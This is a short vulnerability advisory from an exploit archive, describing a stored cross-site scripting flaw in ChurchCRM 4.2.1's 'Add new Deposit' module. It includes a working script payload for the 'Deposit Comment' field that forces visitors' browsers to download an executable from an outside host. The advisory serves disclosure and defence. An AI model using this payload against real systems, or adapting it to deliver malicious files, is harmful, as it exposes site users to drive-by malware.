ChurchCRM 4.2.1 Cross Site Scripting

2020.12.03

Credit: Mufaddal Masalawala

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

#Exploit Title: ChurchCRM 4.2.1- Persistent Cross Site Scripting(XSS)
#Date: 2020- 10- 29
#Exploit Author: Mufaddal Masalawala
#Vendor Homepage: https://churchcrm.io/
#Software Link: https://github.com/ChurchCRM/CRM
#Version: 4.2.1
#Tested on: Kali Linux 2020.3
#Proof Of Concept:
ChurchCRM application allows stored XSS , via 'Add new Deposit' module, that is rendered upon 'View All Deposits' page visit. There are multiple locations where this can be replicated To exploit this vulnerability:
1. Login to the application, go to 'View all Deposits' module.
2. Add the payload ( <script>var link = document.createElement('a');
link.href = 'http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe';
link.download = ''; document.body.appendChild(link); link.click();
</script>
) in the 'Deposit Comment' field and click "Add New Deposit".
3. Payload is executed and a .exe file is downloaded.

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

ChurchCRM 4.2.1 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.